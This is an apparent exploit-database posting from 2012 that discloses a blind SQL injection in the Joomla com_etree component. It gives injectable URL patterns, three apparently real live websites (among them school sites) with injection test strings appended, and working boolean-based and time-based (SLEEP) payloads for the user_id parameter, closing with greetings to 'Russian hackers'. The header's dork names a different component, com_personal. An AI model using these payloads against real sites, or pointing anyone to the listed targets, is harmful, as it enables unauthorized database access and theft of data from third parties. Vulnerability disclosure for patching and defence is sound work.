Joomla com_etree Blind SQL-inj Vuln

# Exploit Title: Joomla com_etree Blind SQL-inj Vuln
# Date: 20.02.2012
# Author: Mach1ne
# Version: 1.5.+
# Category:: [remote, webapps]
# Google dork: inurl:com_personal
# Tested in: web
==============================
=================================

Multiple SQL-inj parametrs in Joomla com_personal:

http://localhost/[PATH]/index.php?option=com_etree&view=displays&layout=user&user_id=[SQL]

http://localhost/[PATH]/index.php?option=com_etree&view=displays&layout=category&id=[SQL]

===============================================================
http://gradientshift.com/harrisonCounty/index.php?option=com_etree&view=displays&layout=category&id=6'+and+2=2
http://www.roberts.k12.mt.us/site/index.php?option=com_etree&view=displays&layout=category&id=7'+and+2=2
http://www.canyoncreekschool.org/?option=com_etree&view=displays&layout=user&user_id=5'+and+2=2


GET parameter 'user_id' is vulnerable.

---
Place: GET
Parameter: user_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=com_etree&view=displays&layout=user&user_id=5' AND 425=425 AND 'PbgE'='PbgE

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: option=com_etree&view=displays&layout=user&user_id=5' AND SLEEP(5) AND 'bLot'='bLot

===============================================================

Greetz to : forum.antichat.ru and all Russian hackers
===============================================================